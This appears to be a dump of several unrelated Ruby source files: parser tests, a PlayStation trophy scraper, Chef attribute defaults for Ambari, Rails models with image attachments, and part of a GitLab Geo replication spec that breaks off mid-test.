lambda { @section.column(:id, 30) }.should raise_error(FixedWidth::DuplicateGroupNameError, /group named 'id'/)
end
it "should prevent group names that already exist as columns" do
@section.column :foo, 11
lambda { @section.column(:id, 30, :group => :foo) }.should raise_error(FixedWidth::DuplicateGroupNameError, /column named 'foo'/)
end
it "should prevent duplicate column names within groups" do
@section.column :id, 10, :group => :foo
lambda { @section.column(:id, 30, :group => :foo) }.should raise_error(FixedWidth::DuplicateColumnNameError, /column named 'id' in the ':foo' group/)
end
it "should allow duplicate column names in different groups" do
@section.column :id, 10, :group => :foo
lambda { @section.column(:id, 30, :group => :bar) }.should_not raise_error(FixedWidth::DuplicateColumnNameError)
end
it "should allow duplicate column names that are reserved (i.e. spacer)" do
@section.spacer 10
lambda { @section.spacer 10 }.should_not raise_error(FixedWidth::DuplicateColumnNameError)
end
end
it "should accept and store the trap as a block" do
@section.trap { |v| v == 4 }
trap = @section.instance_variable_get(:@trap)
trap.should be_a(Proc)
trap.call(4).should == true
end
describe "when adding a template" do
before(:each) do
@template = mock('templated section', :columns => [1,2,3], :options => {})
@definition = mock("definition", :templates => { :test => @template } )
@section.definition = @definition
end
it "should ensure the template exists" do
@definition.stub! :templates => {}
lambda { @section.template(:none) }.should raise_error(ArgumentError)
end
it "should add the template columns to the current column list" do
@section.template :test
@section.should have(3).columns
end
it "should merge the template option" do
@section = FixedWidth::Section.new(:body, :align => :left)
@section.definition = @definition
@template.stub! :options => {:align => :right}
@section.template :test
@section.options.should == {:align => :left}
end
end
describe "when formatting a row" do
before(:each) do
@data = { :id => 3, :name => "Ryan" }
end
it "should default to string data aligned right" do
@section.column(:id, 5)
@section.column(:name, 10)
@section.format( @data ).should == " 3 Ryan"
end
it "should left align if asked" do
@section.column(:id, 5)
@section.column(:name, 10, :align => :left)
@section.format(@data).should == " 3Ryan "
end
it "should read from groups" do
@data = { :id => 3, :foo => { :name => "Ryan" } }
@section.column(:id, 5)
@section.column(:name, 10, :align => :left, :group => :foo)
@section.format(@data).should == " 3Ryan "
end
end
describe "when parsing a file" do
before(:each) do
@line = ' 45 Ryan WoรณdSC '
@section = FixedWidth::Section.new(:body)
@column_content = { :id => 5, :first => 10, :last => 10, :state => 2 }
end
it "should return a key for key column" do
@column_content.each { |k,v| @section.column(k, v) }
parsed = @section.parse(@line)
@column_content.each_key { |name| parsed.should have_key(name) }
end
it "should not return a key for reserved names" do
@column_content.each { |k,v| @section.column(k, v) }
@section.spacer 5
@section.should have(5).columns
parsed = @section.parse(@line)
parsed.should have(4).keys
end
it "should break columns into groups" do
@section.column(:id, 5)
@section.column(:first, 10, :group => :name)
@section.column(:last, 10, :group => :name)
@section.column(:state, 2, :group => :address)
@section.spacer 5
@section.should have(5).columns
parsed = @section.parse(@line)
parsed.should have(3).keys
parsed[:id].should == '45'
parsed[:name][:first].should == 'Ryan'
parsed[:name][:last].should == 'Woรณd'
parsed[:address][:state].should == 'SC'
end
it "should not die if a field is not in range" do
@section.column(:a, 5)
@section.column(:b, 5)
@section.column(:c, 5)
line = ' 45'
parsed = @section.parse(line)
parsed[:a].should == '45'
parsed[:b].should == ''
parsed[:c].should == ''
end
end
it "should try to match a line using the trap" do
@section.trap do |line|
line == 'hello'
end
@section.match('hello').should be_true
@section.match('goodbye').should be_false
end
end
| 34.095238 | 156 | 0.604904 |
0839752c91f002510d01746f6b0578c297e3d670 | 2,270 | require "nokogiri"
require "net/http"
require "uri"
module PsnTrophies
class NoUserProfileError < StandardError; end
class Client
def trophies(profile_id)
check_profile_id(profile_id)
body = get_body("http://us.playstation.com/playstation/psn/profile/#{profile_id}/get_ordered_trophies_data",
"http://us.playstation.com/publictrophy/index.htm?onlinename=#{profile_id}/trophies")
games = []
doc = Nokogiri::HTML.fragment(body)
doc.css('.slotcontent').each do |container|
logo = container.at_css('.titlelogo img')["src"]
title = container.at_css('.gameTitleSortField').content
progress = container.at_css('.gameProgressSortField').content
trophies = container.at_css('.gameTrophyCountSortField').content.strip
games << PlayedGame.new(:image_url => logo, :title => title, :progress => progress, :trophy_count => trophies)
end
games
end
private
def check_profile_id(profile_id)
body = get_body("http://us.playstation.com/playstation/psn/profiles/#{profile_id}",
"http://us.playstation.com/publictrophy/index.htm?onlinename=#{profile_id}")
doc = Nokogiri::HTML(body)
error_section = doc.at_css('.errorSection')
unless error_section.nil?
raise NoUserProfileError.new("No User Profile for #{profile_id}")
end
end
def get_body(uri, referer)
uri = URI.parse(uri)
http = Net::HTTP.new(uri.host, uri.port)
request = Net::HTTP::Get.new(uri.request_uri)
request["Host"] = "us.playstation.com"
request["User-Agent"] = "Mozilla/5.0 (X11; Linux i686; rv:7.0.1) Gecko/20100101 Firefox/7.0.1"
request["Accept"] = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
request["Accept-Language"] = "en-us,en;q=0.5"
request["Accept-Charset"] = "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
request["Connection"] = "keep-alive"
request["Referer"] = referer
response = http.request(request)
response.body
end
end
class PlayedGame
attr_accessor :image_url, :title, :progress, :trophy_count
def initialize(attrs = {})
attrs.each { |attr, value| self.send(:"#{attr}=", value) }
end
end
end
| 32.898551 | 118 | 0.64978 |
26352e993516b275bd86362ec8ff392b3a431775 | 5,206 | #
# Cookbook :: ambari
# Attribute :: default
# Copyright 2018, Bloomberg Finance L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# APT repository attributes
default['apt']['compile_time_update'] = 'true'
default['ambari']['repo_key'] = 'hortonworks.key'#'B9733A7A07513CAD'
node.default['ambari']['ambari_server_version'] = '2.6.1.5'
node.default['ambari']['platform_major_version'] = "#{node['platform']}#{node['platform_version'].split('.')[0]}"
node.default['ambari']['ambari_ubuntu_repo_url'] = "http://public-repo-1.hortonworks.com/ambari/#{node['ambari']['platform_major_version']}/2.x/updates/#{node['ambari']['ambari_server_version']}"
# Ambari properties
node.default['ambari']['ambari-server-startup-web-timeout'] = '150'
node.default['ambari']['ambari_server_host'] = 'servername.ambari.apache.org'
node.default['ambari']['ambari_server_conf_dir'] = '/etc/ambari-server/conf/'
node.default['ambari']['ambari_agent_conf_dir'] = '/etc/ambari-ag/ent/conf/'
# node.default['ambari']['java_home'] = "/usr/lib/jvm/java-#{node[:java][:jdk_version]}-#{node[:java][:install_flavor]}-amd64"
node.default['ambari']['java_home'] = "/usr/lib/jvm/java-8-oracle-amd64"
node.default['ambari']['use_local_repo'] = 'false'
node.default['ambari']['ambari_server_base_url'] = 'http://localhost:8080'
node.default['ambari']['ambari_views_url'] = "#{node['ambari']['ambari_server_base_url']}/api/v1/views"
node.default['ambari']['admin']['user'] = 'admin'
node.default['ambari']['admin']['password'] = 'admin'
node.default['ambari']['kerberos']['enabled'] = false
node.default['ambari']['kerberos']['principal'] = 'ambari@EXAMPLE.COM'
node.default['ambari']['kerberos']['keytab']['location'] = '/etc/security/keytabs/ambari.service.keytab'
#Ambari internal postgres database attributes
node.default['ambari']['pg_db_script_path'] = '/var/lib/ambari-server/resources/Ambari-DDL-Postgres-EMBEDDED-CREATE.sql'
node.default['ambari']['pg_schema_path'] = '/var/lib/ambari-server/resources/Ambari-DDL-Postgres-CREATE.sql'
# Ambari External Database attributes
node.default['ambari']['embeddeddbhost'] = 'localhost'
node.default['ambari']['db_type'] = 'embedded'
node.default['ambari']['databaseport'] = '3306'
node.default['ambari']['databasehost'] = ['localhost']
node.default['ambari']['databasename'] = 'ambari'
node.default['ambari']['databaseusername'] = 'ambari'
node.default['ambari']['databasepassword'] = 'bigdata'
# FILES view attributes
node.default['ambari']['files_path'] = "FILES/versions/1.0.0/instances/FILES_NEW_INSTANCE"
node.default['ambari']['webhdfs.client.failover.proxy.provider'] = 'org.apache.hadoop.hdfs.server.namenode.ha.ConfiguredFailoverProxyProvider'
node.default['ambari']['webhdfs.ha.namenode.http-address.nn1'] = 'namenode1:50070'
node.default['ambari']['webhdfs.ha.namenode.http-address.nn2'] = 'namenode2:50070'
node.default['ambari']['webhdfs.ha.namenode.https-address.nn1'] = 'namenode1:50470'
node.default['ambari']['webhdfs.ha.namenode.https-address.nn2'] = 'namenode2:50470'
node.default['ambari']['webhdfs.ha.namenode.rpc-address.nn1'] = 'namenode1:8020'
node.default['ambari']['webhdfs.ha.namenode.rpc-address.nn2'] = 'namenode2:8020'
node.default['ambari']['webhdfs.ha.namenodes.list'] = 'nn1,nn2'
node.default['ambari']['webhdfs.nameservices'] = 'hacluster'
node.default['ambari']['webhdfs.url'] = 'webhdfs://hacluster'
node.default['ambari']['webhdfs.auth'] = 'auth=SIMPLE'
# Hive View Attributes
node.default['ambari']['hive20_view_path'] = 'HIVE/versions/2.0.0/instances/HIVE_NEW_INSTANCE'
node.default['ambari']['hive.jdbc.url'] = 'jdbc:hive2://127.0.0.1:10000'
node.default['ambari']['yarn.ats.url'] = 'http://localhost:8188'
node.default['ambari']['yarn.resourcemanager.url'] = 'http://localhost:8088'
node.default['ambari']['hive20_proxy_user'] = 'hive.server2.proxy.user=${username}'
#WorkflowManager_view Attributes
node.default['ambari']['oozie.service.uri'] = 'http://localhost:11000/oozie'
node.default['ambari']['hadoop.security.authentication'] = 'simple'
node.default['ambari']['wfmanager_view_path'] = 'WORKFLOW_MANAGER/versions/1.0.0/instances/WFM_NEW_INSTANCE'
node.default['ambari']['yarn.resourcemanager.address'] = 'http://localhost:8032'
#Tez views
node.default['ambari']['tez_view_path'] = 'TEZ/versions/0.7.0.2.6.4.0-91/instances/TEZ_NEW_INSTANCE'
node.default['ambari']['timeline.http.auth.type'] = 'simple'
node.default['ambari']['hadoop.http.auth.type'] = 'simple'
# Ambari Views Attributes
node.default['ambari']['webhcat.hostname'] = 'u1203.ambari.apache.org'
node.default['ambari']['webhcat.port'] = '50111'
node.default['ambari']['webhcat.hostname'] = 'u1203.ambari.apache.org'
node.default['ambari']['webhcat.port'] = '50111'
| 51.039216 | 195 | 0.733577 |
7ad7f89ba731f3197897a72d036233d103f6c9de | 482 | class OgcFilterProvider
@@ADDITIONAL_QUERYABLE_NAME = "Provider"
# ProviderId is not an ISO queryable, it is captured into AdditionalQueryables
@@CMR_PROVIDER_ID_PARAM = ADDITIONAL_QUERYABLES_TO_CMR_QUERYABLES[@@ADDITIONAL_QUERYABLE_NAME][1]
def process(ogc_filter)
# the provider_id CMR param supports a wilcard
cmr_query_hash = OgcFilterHelper.process_queryable(ogc_filter, @@ADDITIONAL_QUERYABLE_NAME, @@CMR_PROVIDER_ID_PARAM, true)
cmr_query_hash
end
end | 40.166667 | 126 | 0.809129 |
f83dd146b973af423f3e1fee6f29965b02877d16 | 5,205 | # Copyright 2018 Operation Paws for Homes
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# == Schema Information
#
# Table name: campaigns
#
# id :bigint not null, primary key
# title :string
# goal :integer
# summary :text
# created_by_user_id :integer
# description :text
# primary_photo_file_name :string
# primary_photo_content_type :string
# primary_photo_file_size :integer
# primary_photo_updated_at :datetime
# left_photo_file_name :string
# left_photo_content_type :string
# left_photo_file_size :integer
# left_photo_updated_at :datetime
# middle_photo_file_name :string
# middle_photo_content_type :string
# middle_photo_file_size :integer
# middle_photo_updated_at :datetime
# right_photo_file_name :string
# right_photo_content_type :string
# right_photo_file_size :integer
# right_photo_updated_at :datetime
# created_at :datetime not null
# updated_at :datetime not null
# active :boolean default(TRUE)
class Campaign < ApplicationRecord
include ClientValidated
attr_accessor :primary_photo_delete,
:left_photo_delete,
:middle_photo_delete,
:right_photo_delete
before_save :delete_photo!
ATTACHMENT_MAX_SIZE = 5
CONTENT_TYPES = {"Images" => ['image/jpg', 'image/jpeg', 'image/pjpeg', 'image/png', 'image/x-png', 'image/gif']}.freeze
MIME_TYPES = CONTENT_TYPES.values.flatten
VALIDATION_ERROR_MESSAGES = { primary_photo: ["image_constraints", { max_size: ATTACHMENT_MAX_SIZE }],
left_photo: ["image_constraints", { max_size: ATTACHMENT_MAX_SIZE }],
middle_photo: ["image_constraints", { max_size: ATTACHMENT_MAX_SIZE }],
right_photo: ["image_constraints", { max_size: ATTACHMENT_MAX_SIZE }] }.freeze
validates_presence_of :title,
:goal,
:description
has_many :donations, dependent: :restrict_with_error
scope :active, -> { where(active: true) }
scope :inactive, -> { where(active: false) }
has_attached_file :primary_photo,
styles: { medium: '800x800>',
small: '400x400',
thumb: '200x200' },
path: ':rails_root/public/system/campaign_photos/:id/primary/:style/:filename',
url: '/system/campaign_photos/:id/primary/:style/:filename'
validates_attachment_size :primary_photo, less_than: ATTACHMENT_MAX_SIZE.megabytes
validates_attachment_content_type :primary_photo, content_type: MIME_TYPES
has_attached_file :left_photo,
styles: { medium: '800x800>',
small: '400x400',
thumb: 'x200' },
path: ':rails_root/public/system/campaign_photos/:id/left/:style/:filename',
url: '/system/campaign_photos/:id/left/:style/:filename'
validates_attachment_size :left_photo, less_than: ATTACHMENT_MAX_SIZE.megabytes
validates_attachment_content_type :left_photo, content_type: MIME_TYPES
has_attached_file :middle_photo,
styles: { medium: '800x800>',
small: '400x400',
thumb: 'x200' },
path: ':rails_root/public/system/campaign_photos/:id/middle/:style/:filename',
url: '/system/campaign_photos/:id/middle/:style/:filename'
validates_attachment_size :middle_photo, less_than: ATTACHMENT_MAX_SIZE.megabytes
validates_attachment_content_type :middle_photo, content_type: MIME_TYPES
has_attached_file :right_photo,
styles: { medium: '800x800>',
small: '400x400',
thumb: 'x200' },
path: ':rails_root/public/system/campaign_photos/:id/right/:style/:filename',
url: '/system/campaign_photos/:id/right/:style/:filename'
validates_attachment_size :right_photo, less_than: ATTACHMENT_MAX_SIZE.megabytes
validates_attachment_content_type :right_photo, content_type: MIME_TYPES
def progress
donations.sum(:amount)
end
private
def delete_photo!
primary_photo.clear if primary_photo_delete == '1'
left_photo.clear if left_photo_delete == '1'
middle_photo.clear if middle_photo_delete == '1'
right_photo.clear if right_photo_delete == '1'
end
end
| 41.64 | 122 | 0.631508 |
edd909495c2344c4c8f74299e3c8fb37e25e4604 | 709 | # frozen_string_literal: true
# Detect sites using Cloudflare Polish and bypass it by adding a random
# cache-busting URL param.
#
# @see https://support.cloudflare.com/hc/en-us/articles/360000607372-Using-Cloudflare-Polish-to-compress-images
module Danbooru
class Http
class UnpolishCloudflare < HTTP::Feature
HTTP::Options.register_feature :unpolish_cloudflare, self
def perform(request, &block)
response = yield request
if response.headers["CF-Polished"].present?
request.uri.query_values = request.uri.query_values.to_h.merge(danbooru_no_polish: SecureRandom.uuid)
response = yield request
end
response
end
end
end
end
| 28.36 | 111 | 0.715092 |
ac728ae2323af900faa384cc3a0fe9c96f9b7c85 | 607 | require 'spec_helper'
describe ApplicationHelper do
describe :markup_to_html do
it "should convert markdown into html" do
markdown = <<EOS
* Foo
* Bar
* Baz
EOS
content = helper.markup_to_html(markdown)
content.should have_selector("li", :count => 3)
end
end
describe :path_to_issue do
it "should delegate to main_app.issue_path" do
issue = FactoryGirl.build_stubbed(:issue)
issue.stub(:number).and_return(1)
helper.path_to_issue(issue).should == issue_path(:user => issue.project.user.username, :key => issue.project.key, :id => 1)
end
end
end
| 25.291667 | 129 | 0.69028 |
391ab0d4371b295d56d8ffeb4f1927603d4dee63 | 247 | class AddDefaultsToProjectContent < ActiveRecord::Migration
def change
%i(title description introduction science_case result faq education_content).each do |column|
change_column_default :project_contents, column, ""
end
end
end
| 30.875 | 97 | 0.781377 |
5dd666bd8dae37d5e2fa207554c2a85972b479d6 | 41 | module Emailable
VERSION = '3.0.1'
end
| 10.25 | 19 | 0.682927 |
7a43e21699014d71c931214606627823948e5bf8 | 1,176 | require "spec_helper"
feature "rails application" do
before { Capybara.app = TestRailsApp::Application }
scenario 'block legal request issued by yundun' do
page.driver.header('User-Agent', ' Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;Alibaba.Security.Heimdall.950384.p')
visit '/posts'
expect(page.status_code).to eq 406
end
scenario 'block illegal request issued by yundun' do
page.driver.header('User-Agent', ' Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;Alibaba.Security.Heimdall.950384.p')
visit '/url_not_exists'
expect(page.status_code).to eq 406
end
scenario 'normal request should be fine' do
page.driver.header('User-Agent', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36')
visit '/posts'
expect(page.status_code).to eq 200
end
scenario 'illegal request should throw 404' do
page.driver.header('User-Agent', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36')
visit '/url_not_exists'
expect(page.status_code).to eq 404
end
end | 31.783784 | 161 | 0.716837 |
5d6c16da71522d3487e172de38d0a8f077f67d55 | 5,338 | class Asset < ActiveRecord::Base
# used for extra mime types that dont follow the convention
@@image_content_types = ['image/jpeg', 'image/pjpeg', 'image/gif', 'image/png', 'image/x-png', 'image/jpg']
@@extra_content_types = { :audio => ['application/ogg'], :movie => ['application/x-shockwave-flash'], :pdf => ['application/pdf'] }.freeze
cattr_reader :extra_content_types, :image_content_types
# use #send due to a ruby 1.8.2 issue
@@image_condition = send(:sanitize_sql, ['asset_content_type IN (?)', image_content_types]).freeze
@@movie_condition = send(:sanitize_sql, ['asset_content_type LIKE ? OR asset_content_type IN (?)', 'video%', extra_content_types[:movie]]).freeze
@@audio_condition = send(:sanitize_sql, ['asset_content_type LIKE ? OR asset_content_type IN (?)', 'audio%', extra_content_types[:audio]]).freeze
@@other_condition = send(:sanitize_sql, [
'asset_content_type NOT LIKE ? AND asset_content_type NOT LIKE ? AND asset_content_type NOT IN (?)',
'audio%', 'video%', (extra_content_types[:movie] + extra_content_types[:audio] + image_content_types)]).freeze
cattr_reader *%w(movie audio image other).collect! { |t| "#{t}_condition".to_sym }
class << self
def image?(asset_content_type)
image_content_types.include?(asset_content_type)
end
def movie?(asset_content_type)
asset_content_type.to_s =~ /^video/ || extra_content_types[:movie].include?(asset_content_type)
end
def audio?(asset_content_type)
asset_content_type.to_s =~ /^audio/ || extra_content_types[:audio].include?(asset_content_type)
end
def other?(asset_content_type)
![:image, :movie, :audio].any? { |a| send("#{a}?", asset_content_type) }
end
def pdf?(asset_content_type)
extra_content_types[:pdf].include? asset_content_type
end
def find_all_by_content_types(types, *args)
with_content_types(types) { find *args }
end
def with_content_types(types, &block)
with_scope(:find => { :conditions => types_to_conditions(types).join(' OR ') }, &block)
end
def types_to_conditions(types)
types.collect! { |t| '(' + send("#{t}_condition") + ')' }
end
end
order_by 'title'
if Radiant::Config["assets.additional_thumbnails"]
thumbnails = Radiant::Config["assets.additional_thumbnails"].split(', ').collect{|s| s.split('=')}.inject({}) {|ha, (k, v)| ha[k.to_sym] = v; ha}
else
thumbnails = {}
end
thumbnails[:icon] = ['42x42#', :png]
thumbnails[:thumbnail] = '100x100>'
has_attached_file :asset,
:styles => thumbnails,
:whiny_thumbnails => false,
:url => "/:class/:id/:basename:no_original_style.:extension",
:path => ":rails_root/public/:class/:id/:basename:no_original_style.:extension"
has_many :page_attachments, :dependent => :destroy
has_many :pages, :through => :page_attachments
belongs_to :created_by, :class_name => 'User'
belongs_to :updated_by, :class_name => 'User'
validates_attachment_presence :asset, :message => "You must choose a file to upload!"
validates_attachment_content_type :asset,
:content_type => Radiant::Config["assets.content_types"].split(', ') if Radiant::Config["assets.content_types"]
validates_attachment_size :asset,
:less_than => Radiant::Config["assets.max_asset_size"].to_i.megabytes if Radiant::Config["assets.max_asset_size"]
before_save :assign_title
def thumbnail(size = nil)
if size == 'original' or size.nil?
self.asset.url
else
if self.pdf?
"/images/assets/pdf_#{size.to_s}.png"
elsif self.movie?
"/images/assets/movie_#{size.to_s}.png"
elsif self.audio?
"/images/assets/audio_#{size.to_s}.png"
elsif self.other?
"/images/assets/doc_#{size.to_s}.png"
else
self.asset.url(size.to_sym)
end
end
end
def generate_thumbnail(name, args)
path = File.join(RAILS_ROOT, 'public', self.asset(:original))
self.asset do
path = File.join(RAILS_ROOT, 'public', self.asset(:original))
begin
dimensions, format = args
dimensions = dimensions.call(instance) if dimensions.respond_to? :call
@queued_for_write[name] = Paperclip::Thumbnail.make(File.new(path),
dimensions,
format,
@whiny_thumnails)
rescue PaperclipError => e
@errors << e.message if @whiny_thumbnails
end
attachment.save
end
end
def basename
File.basename(asset_file_name, ".*") if asset_file_name
end
def extension
asset_file_name.split('.').last.downcase if asset_file_name
end
[:movie, :audio, :image, :other, :pdf].each do |content|
define_method("#{content}?") { self.class.send("#{content}?", asset_content_type) }
end
private
def assign_title
self.title = basename if title.blank?
end
def additional_thumbnails
Radiant::Config["assets.additional_thumbnails"].split(',').collect{|s| s.split('=')}.inject({}) {|ha, (k.to_sym, v)| ha[k] = v; ha}
end
end
| 36.813793 | 149 | 0.633945 |
bbaf8d74b6d01b7476babe5766b9ca752ecf241e | 105 | module Trade
Entity = Struct.new(:cost, :price) do
def volume
cost / price
end
end
end
| 13.125 | 39 | 0.609524 |
bb1a40409dbb0ffec461611ea0466b5512d15e39 | 147 | class AddCurrencyToPaymentTransactions < ActiveRecord::Migration
def change
add_column :payment_transactions, :currency, :integer
end
end
| 21 | 64 | 0.802721 |
ede8ff5603d0b1517598ed191f23de91e24d8da5 | 79 | class User < ActiveRecord::Base
has_secure_password
has_many :players
end
| 13.166667 | 31 | 0.78481 |
b91da6f3ead127e69643d9dae87c679e9e838f94 | 17,354 | # frozen_string_literal: true
# This should be included on any Replicator which implements verification.
#
# Expected let variables:
#
# - primary
# - secondary
# - model_record
# - replicator
#
RSpec.shared_examples 'a verifiable replicator' do
include EE::GeoHelpers
describe 'events' do
it 'has checksum_succeeded event' do
expect(described_class.supported_events).to include(:checksum_succeeded)
end
end
describe '.verification_enabled?' do
context 'when replication is enabled' do
before do
expect(described_class).to receive(:enabled?).and_return(true)
end
context 'when verification_feature_flag_enabled? returns true' do
it 'returns true' do
allow(described_class).to receive(:verification_feature_flag_enabled?).and_return(true)
expect(described_class.verification_enabled?).to be_truthy
end
end
context 'when verification_feature_flag_enabled? returns false' do
it 'returns false' do
allow(described_class).to receive(:verification_feature_flag_enabled?).and_return(false)
expect(described_class.verification_enabled?).to be_falsey
end
end
end
context 'when replication is disabled' do
before do
expect(described_class).to receive(:enabled?).and_return(false)
end
it 'returns false' do
expect(described_class.verification_enabled?).to be_falsey
end
end
end
describe '.checksummed_count' do
context 'when verification is enabled' do
before do
allow(described_class).to receive(:verification_enabled?).and_return(true)
end
it 'returns the number of available verifiables where verification succeeded' do
model_record.verification_started
model_record.verification_succeeded_with_checksum!('some checksum', Time.current)
expect(described_class.checksummed_count).to eq(1)
end
it 'excludes non-success verification states' do
model_record.verification_started!
expect(described_class.checksummed_count).to eq(0)
model_record.verification_failed_with_message!('some error message')
expect(described_class.checksummed_count).to eq(0)
model_record.verification_pending!
expect(described_class.checksummed_count).to eq(0)
end
end
context 'when verification is disabled' do
it 'returns nil' do
allow(described_class).to receive(:verification_enabled?).and_return(false)
expect(described_class.checksummed_count).to be_nil
end
end
end
describe '.checksum_failed_count' do
context 'when verification is enabled' do
before do
allow(described_class).to receive(:verification_enabled?).and_return(true)
end
it 'returns the number of available verifiables where verification failed' do
model_record.verification_started!
model_record.verification_failed_with_message!('some error message')
expect(described_class.checksum_failed_count).to eq(1)
end
it 'excludes other verification states' do
model_record.verification_started!
expect(described_class.checksum_failed_count).to eq(0)
model_record.verification_succeeded_with_checksum!('foo', Time.current)
expect(described_class.checksum_failed_count).to eq(0)
model_record.verification_pending!
expect(described_class.checksum_failed_count).to eq(0)
end
end
context 'when verification is disabled' do
it 'returns nil' do
allow(described_class).to receive(:verification_enabled?).and_return(false)
expect(described_class.checksum_failed_count).to be_nil
end
end
end
describe '.trigger_background_verification' do
context 'when verification is enabled' do
before do
allow(described_class).to receive(:verification_enabled?).and_return(true)
end
it 'enqueues VerificationBatchWorker' do
expect(::Geo::VerificationBatchWorker).to receive(:perform_with_capacity).with(described_class.replicable_name)
described_class.trigger_background_verification
end
it 'enqueues VerificationTimeoutWorker' do
expect(::Geo::VerificationTimeoutWorker).to receive(:perform_async).with(described_class.replicable_name)
described_class.trigger_background_verification
end
context 'for a Geo secondary' do
it 'does not enqueue ReverificationBatchWorker' do
stub_secondary_node
expect(::Geo::ReverificationBatchWorker).not_to receive(:perform_async)
described_class.trigger_background_verification
end
end
context 'for a Geo primary' do
it 'enqueues ReverificationBatchWorker' do
stub_primary_node
expect(::Geo::ReverificationBatchWorker).to receive(:perform_async).with(described_class.replicable_name)
described_class.trigger_background_verification
end
end
end
context 'when verification is disabled' do
before do
allow(described_class).to receive(:verification_enabled?).and_return(false)
end
it 'does not enqueue VerificationBatchWorker' do
expect(::Geo::VerificationBatchWorker).not_to receive(:perform_with_capacity)
described_class.trigger_background_verification
end
it 'does not enqueue VerificationTimeoutWorker' do
expect(::Geo::VerificationTimeoutWorker).not_to receive(:perform_async)
described_class.trigger_background_verification
end
end
end
describe '.verify_batch' do
context 'when there are records needing verification' do
let(:another_replicator) { double('another_replicator', verify: true) }
let(:replicators) { [replicator, another_replicator] }
before do
allow(described_class).to receive(:replicator_batch_to_verify).and_return(replicators)
end
it 'calls #verify on each replicator' do
expect(replicator).to receive(:verify)
expect(another_replicator).to receive(:verify)
described_class.verify_batch
end
end
end
describe '.remaining_verification_batch_count' do
it 'converts needs_verification_count to number of batches' do
expected_limit = 40
expect(described_class).to receive(:needs_verification_count).with(limit: expected_limit).and_return(21)
expect(described_class.remaining_verification_batch_count(max_batch_count: 4)).to eq(3)
end
end
describe '.remaining_reverification_batch_count' do
it 'converts needs_reverification_count to number of batches' do
expected_limit = 4000
expect(described_class).to receive(:needs_reverification_count).with(limit: expected_limit).and_return(1500)
expect(described_class.remaining_reverification_batch_count(max_batch_count: 4)).to eq(2)
end
end
describe '.reverify_batch!' do
it 'calls #reverify_batch' do
allow(described_class).to receive(:reverify_batch).with(batch_size: described_class::DEFAULT_REVERIFICATION_BATCH_SIZE)
described_class.reverify_batch!
end
end
describe '.replicator_batch_to_verify' do
it 'returns usable Replicator instances' do
model_record.save!
expect(described_class).to receive(:model_record_id_batch_to_verify).and_return([model_record.id])
first_result = described_class.replicator_batch_to_verify.first
expect(first_result.class).to eq(described_class)
expect(first_result.model_record_id).to eq(model_record.id)
end
end
describe '.model_record_id_batch_to_verify' do
let(:pending_ids) { [1, 2] }
before do
allow(described_class).to receive(:verification_batch_size).and_return(verification_batch_size)
allow(described_class).to receive(:verification_pending_batch).with(batch_size: verification_batch_size).and_return(pending_ids)
end
context 'when the batch is filled by pending rows' do
let(:verification_batch_size) { 2 }
it 'returns IDs of pending rows' do
expect(described_class.model_record_id_batch_to_verify).to eq(pending_ids)
end
it 'does not call .verification_failed_batch' do
expect(described_class).not_to receive(:verification_failed_batch)
described_class.model_record_id_batch_to_verify
end
end
context 'when that batch is not filled by pending rows' do
let(:failed_ids) { [3, 4, 5] }
let(:verification_batch_size) { 5 }
it 'includes IDs of failed rows' do
remaining_capacity = verification_batch_size - pending_ids.size
allow(described_class).to receive(:verification_failed_batch).with(batch_size: remaining_capacity).and_return(failed_ids)
result = described_class.model_record_id_batch_to_verify
expect(result).to include(*pending_ids)
expect(result).to include(*failed_ids)
end
end
end
describe '.verification_pending_batch' do
context 'when current node is a primary' do
it 'delegates to the model class of the replicator' do
expect(described_class.model).to receive(:verification_pending_batch)
described_class.verification_pending_batch
end
end
context 'when current node is a secondary' do
it 'delegates to the registry class of the replicator' do
stub_current_geo_node(secondary)
expect(described_class.registry_class).to receive(:verification_pending_batch)
described_class.verification_pending_batch
end
end
end
describe '.verification_failed_batch' do
context 'when current node is a primary' do
it 'delegates to the model class of the replicator' do
expect(described_class.model).to receive(:verification_failed_batch)
described_class.verification_failed_batch
end
end
context 'when current node is a secondary' do
it 'delegates to the registry class of the replicator' do
stub_current_geo_node(secondary)
expect(described_class.registry_class).to receive(:verification_failed_batch)
described_class.verification_failed_batch
end
end
end
describe '.fail_verification_timeouts' do
context 'when current node is a primary' do
it 'delegates to the model class of the replicator' do
expect(described_class.model).to receive(:fail_verification_timeouts)
described_class.fail_verification_timeouts
end
end
context 'when current node is a secondary' do
it 'delegates to the registry class of the replicator' do
stub_current_geo_node(secondary)
expect(described_class.registry_class).to receive(:fail_verification_timeouts)
described_class.fail_verification_timeouts
end
end
end
describe '#after_verifiable_update' do
it 'calls verify_async if needed' do
allow(described_class).to receive(:verification_enabled?).and_return(true)
allow(replicator).to receive(:primary_checksum).and_return(nil)
allow(replicator).to receive(:checksummable?).and_return(true)
expect(replicator).to receive(:verify_async)
replicator.after_verifiable_update
end
end
describe '#verify_async' do
before do
model_record.save!
end
context 'on a Geo primary' do
before do
stub_primary_node
end
it 'calls verification_started! and enqueues VerificationWorker' do
expect(model_record).to receive(:verification_started!)
expect(Geo::VerificationWorker).to receive(:perform_async).with(replicator.replicable_name, model_record.id)
replicator.verify_async
end
end
end
describe '#verify' do
it 'wraps the checksum calculation in track_checksum_attempt!' do
tracker = double('tracker')
